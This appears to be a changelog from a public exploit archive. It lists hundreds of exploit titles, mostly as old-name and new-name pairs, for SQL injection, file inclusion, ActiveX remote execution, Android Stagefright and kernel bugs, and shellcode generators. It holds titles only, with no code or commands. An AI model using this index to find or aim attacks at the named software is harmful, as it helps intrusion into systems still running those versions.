a099e58626
3 new exploits
Android - getpidcon Usage binder Service Replacement Race Condition
Google Android - getpidcon Usage binder Service Replacement Race Condition
ADODB < 4.70 - (tmssql.php) Denial of Service
ADODB < 4.70 - 'tmssql.php' Denial of Service
FlashGet 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Execution (PoC)
SopCast SopCore Control ActiveX - Remote Exec (PoC)
UUSee ReliPlayer ActiveX - Remote Exec (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)
SopCast SopCore Control ActiveX - Remote Execution (PoC)
UUSee ReliPlayer ActiveX - Remote Execution (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)
Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)
Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)
EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities
EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities
Android Kernel 2.6 - Local Denial of Service Crash (PoC)
Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)
IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities
IBM solidDB 6.0.10 - Format String / Denial of Service
OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities
OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities
Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities
Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow
Android - ih264d_process_intra_mb Memory Corruption
Google Android - 'ih264d_process_intra_mb' Memory Corruption
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Google Android - IOMX getConfig/getParameter Information Disclosure
Google Android - IMemory Native Interface is Insecure for IPC Use
Android Broadcom Wi-Fi Driver - Memory Corruption
Google Android Broadcom Wi-Fi Driver - Memory Corruption
Android - /system/bin/sdcard Stack Buffer Overflow
Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Android - Insufficient Binder Message Verification Pointer Leak
Android - 'gpsOneXtra' Data Files Denial of Service
Google Android - Insufficient Binder Message Verification Pointer Leak
Google Android - 'gpsOneXtra' Data Files Denial of Service
Android - Binder Generic ASLR Leak
Google Android - Binder Generic ASLR Leak
Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Google Android - WifiNative::setHotlist Stack Overflow
Google Android - WifiNative::setHotlist Stack Overflow
Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)
Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)
PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow
PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow
Android 1.x/2.x - Privilege Escalation
Google Android 1.x/2.x - Privilege Escalation
Android - 'sensord' Privilege Escalation
Google Android - 'sensord' Privilege Escalation
tcpdump - ISAKMP Identification payload Integer Overflow
tcpdump - ISAKMP Identification Payload Integer Overflow
Smail 3.2.0.120 - Heap Overflow
Smail 3.2.0.120 - Heap Overflow
HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit
HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution
Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting
navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities
navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure
dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities
dwebpro 6.8.26 - Directory Traversal / File Disclosure
citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities
citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)
Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)
Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)
Apache OFBiz - SQL Remote Execution PoC Payload
Apache OFBiz - FULLADMIN Creator PoC Payload
Apache OFBiz - Remote Execution (via SQL Execution) (PoC)
Apache OFBiz - Admin Creator (PoC)
Android 2.0 < 2.1 - Reverse Shell Exploit
Google Android 2.0 < 2.1 - Reverse Shell Exploit
Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit
Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit
Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap
Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap
ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution
ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution
WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities
WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass
Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow
Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow
McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities
ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities
ServletExec - Directory Traversal / Authentication Bypass
Android - 'Stagefright' Remote Code Execution
Google Android - 'Stagefright' Remote Code Execution
Android - libstagefright Integer Overflow Remote Code Execution
Google Android - libstagefright Integer Overflow Remote Code Execution
Android 2.3.5 - PowerVR SGX Driver Information Disclosure
Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure
Android ADB Debug Server - Remote Payload Execution (Metasploit)
Google Android ADB Debug Server - Remote Payload Execution (Metasploit)
Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Android - 'BadKernel' Remote Code Execution
Google Android - 'BadKernel' Remote Code Execution
Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
NETGEAR WNR2000v5 - Remote Code Execution
Linux/x86 - portbind payload Shellcode (Generator)
Windows XP SP1 - portbind payload Shellcode (Generator)
Linux/x86 - Portbind Payload Shellcode (Generator)
Windows XP SP1 - Portbind Payload Shellcode (Generator)
Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)
Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)
phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution
phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution
Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)
Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection
Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion
Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion
Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion
Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion
paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion
paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion
Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion
Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion
blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
blogme 3.0 - Cross-Site Scripting / Authentication Bypass
torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities
torrentflux 2.2 - Arbitrary File Create/ Execute/Delete
BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities
BBS E-Market Professional - Full Path Disclosure / File Inclusion
myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion
myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion
ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities
ig shop 1.0 - Code Execution / SQL Injection
QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities
QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities
vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting
forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
forum livre 1.0 - SQL Injection / Cross-Site Scripting
otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
otscms 2.1.5 - SQL Injection / Cross-Site Scripting
Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities
Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities
wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
wbblog - Cross-Site Scripting / SQL Injection
PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion
PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion
Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion
PHP Coupon Script 3.0 - (index.php bus) SQL Injection
PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection
runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities
runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities
NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities
NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path
bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting
PHPVID 0.9.9 - (categories_type.php cat) SQL Injection
PHPVID 0.9.9 - 'categories_type.php' SQL Injection
bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
bcoos 1.0.10 - Local File Inclusion / SQL Injection
ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting
gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion
PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass
netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
netrisk 1.9.7 - Cross-Site Scripting / SQL Injection
EasyClassifields 3.0 - (go) SQL Injection
CMSbright - (id_rub_page) SQL Injection
EasyClassifields 3.0 - 'go' Parameter SQL Injection
CMSbright - 'id_rub_page' Parameter SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection
Coupon Script 4.0 - 'id' SQL Injection
Reciprocal Links Manager 1.1 - (site) SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection
Coupon Script 4.0 - 'id' Parameter SQL Injection
Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection
CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection
Spice Classifieds - (cat_path) SQL Injection
CS-Cart 1.3.5 - Authentication Bypass
Spice Classifieds - 'cat_path' Parameter SQL Injection
aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
Living Local Website - 'listtest.php r' SQL Injection
ACG-PTP 1.0.6 - 'adid' SQL Injection
qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ACG-ScriptShop - 'cid' SQL Injection
AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution
Living Local Website - 'listtest.php' SQL Injection
ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection
qwicsite pro - SQL Injection / Cross-Site Scripting
ACG-ScriptShop - 'cid' Parameter SQL Injection
AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution
Vastal I-Tech Agent Zone - (ann_id) SQL Injection
Vastal I-Tech Visa Zone - (news_id) SQL Injection
Vastal I-Tech Toner Cart - 'id' SQL Injection
Vastal I-Tech Share Zone - 'id' SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' SQL Injection
Vastal I-Tech Jobs Zone - (news_id) SQL Injection
Vastal I-Tech MMORPG Zone - (game_id) SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' SQL Injection
Vastal I-Tech Freelance Zone - (coder_id) SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection
EsFaq 2.0 - (idcat) SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection
Vastal I-Tech Dating Zone - (fage) SQL Injection
Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection
Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection
Vastal I-Tech Share Zone - 'id' Parameter SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection
EsFaq 2.0 - 'idcat' Parameter SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection
Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection
Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection
Alstrasoft Forum - (cat) SQL Injection
Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection
Alstrasoft Forum - 'cat' Parameter SQL Injection
Alstrasoft Forum - 'catid' SQL Injection
Alstrasoft Forum - 'catid' Parameter SQL Injection
Creator CMS 5.0 - (sideid) SQL Injection
Creator CMS 5.0 - 'sideid' Parameter SQL Injection
CMS Buzz - 'id' SQL Injection
CMS Buzz - 'id' Parameter SQL Injection
phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection
PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Autodealers CMS AutOnline - (pageid) SQL Injection
Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion
PHPVID 1.1 - Cross-Site Scripting / SQL Injection
Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection
PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion
Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion
Autodealers CMS AutOnline - 'id' SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
PhpWebGallery 1.3.4 - (cat) Blind SQL Injection
Autodealers CMS AutOnline - 'id' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection
PhpWebGallery 1.3.4 - Blind SQL Injection
phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
phpsmartcom 0.2 - Local File Inclusion / SQL Injection
AvailScript Article Script - 'view.php v' SQL Injection
AvailScript Article Script - 'view.php' SQL Injection
Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection
mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities
mini-pub 0.3 - File Disclosure / Code Execution
websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities
websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution
phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities
phpdaily - SQL Injection / Cross-Site Scripting / Local File Download
questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities
questcms - Cross-Site Scripting / Directory Traversal / SQL Injection
MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting
WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting
Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Prozilla Software Directory - Cross-Site Scripting / SQL Injection
TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection
zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting
Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities
Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting
Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload
MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting
ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ftpzik - Cross-Site Scripting / Local File Inclusion
bandwebsite 1.5 - SQL Injection / Cross-Site Scripting
nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
chipmunk topsites - Authentication Bypass / Cross-Site Scripting
Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting
Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting
minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass
wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
wbstreet 1.0 - SQL Injection / File Disclosure
template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities
template creature - SQL Injection / File Disclosure
merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities
merlix educate servert - Authentication Bypass / File Disclosure
nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure
ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities
ASP AutoDealer - SQL Injection / File Disclosure
aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities
aspmanage banners - Arbitrary File Upload / File Disclosure
asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp talk - SQL Injection / Cross-Site Scripting
webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
webcaf 1.4 - Local File Inclusion / Remote Code Execution
PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion
postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities
postecards - SQL Injection / File Disclosure
PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting
living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload
Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery
cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
cf shopkart 5.2.2 - SQL Injection / File Disclosure
the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities
the net guys aspired2blog - SQL Injection / File Disclosure
Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities
Joomla! Component live chat - SQL Injection / Open Proxy
Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities
Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion
autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities
autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File
PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting
isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
isweb CMS 3.0 - SQL Injection / Cross-Site Scripting
clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
clickandemail - SQL Injection / Cross-Site Scripting
Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities
Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection
chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting
phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities
phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service
doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities
doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload
phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
ezpack 4.2b2 - Cross-Site Scripting / SQL Injection
Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection
rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities
blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
rankem - File Disclosure / Cross-Site Scripting / Cookie
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities
gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion
revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
revou twitter clone - Cross-Site Scripting / SQL Injection
bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection
sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting
Android 'content://' URI - Multiple Information Disclosure Vulnerabilities
Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities
Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting
team 1.x - File Disclosure / Cross-Site Scripting
gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass
Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities
Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure
SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution
AdaptCMS Lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities
SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion
SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting
dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure
ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
ideacart 0.02 - Local File Inclusion / SQL Injection
CmsFaethon 2.2.0 - (info.php item) SQL Command Injection
CmsFaethon 2.2.0 - info.php item SQL Command Injection
powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
powermovielist 0.14b - SQL Injection / Cross-Site Scripting
Graugon Forum 1 - 'id' SQL Command Injection
Graugon Forum 1 - 'id' Command Injection (via SQL Injection)
irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities
irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection
ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting
blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities
blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion
tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion
Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities
Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass
PHP Director 0.21 - (sql into outfile) eval() Injection
PHP Director 0.21 - (SQL into outfile) eval() Injection
phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities
phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting
phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpmysport 1.4 - Cross-Site Scripting / SQL Injection
Kim Websites 1.0 - (Authentication Bypass) SQL Injection
Kim Websites 1.0 - Authentication Bypass
Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities
Bloginator 1a - Cookie Bypass / SQL Injection
Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Pixie CMS - Cross-Site Scripting / SQL Injection
Codice CMS 2 - SQL Command Execution
Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection
Codice CMS 2 - Command Execution (via SQL Injection)
Syzygy CMS 0.3 - Local File Inclusion / SQL Injection
acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities
acute control panel 1.0.0 - SQL Injection / Remote File Inclusion
Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities
Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass
ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities
flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure
fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
fungamez rc1 - Authentication Bypass / Local File Inclusion
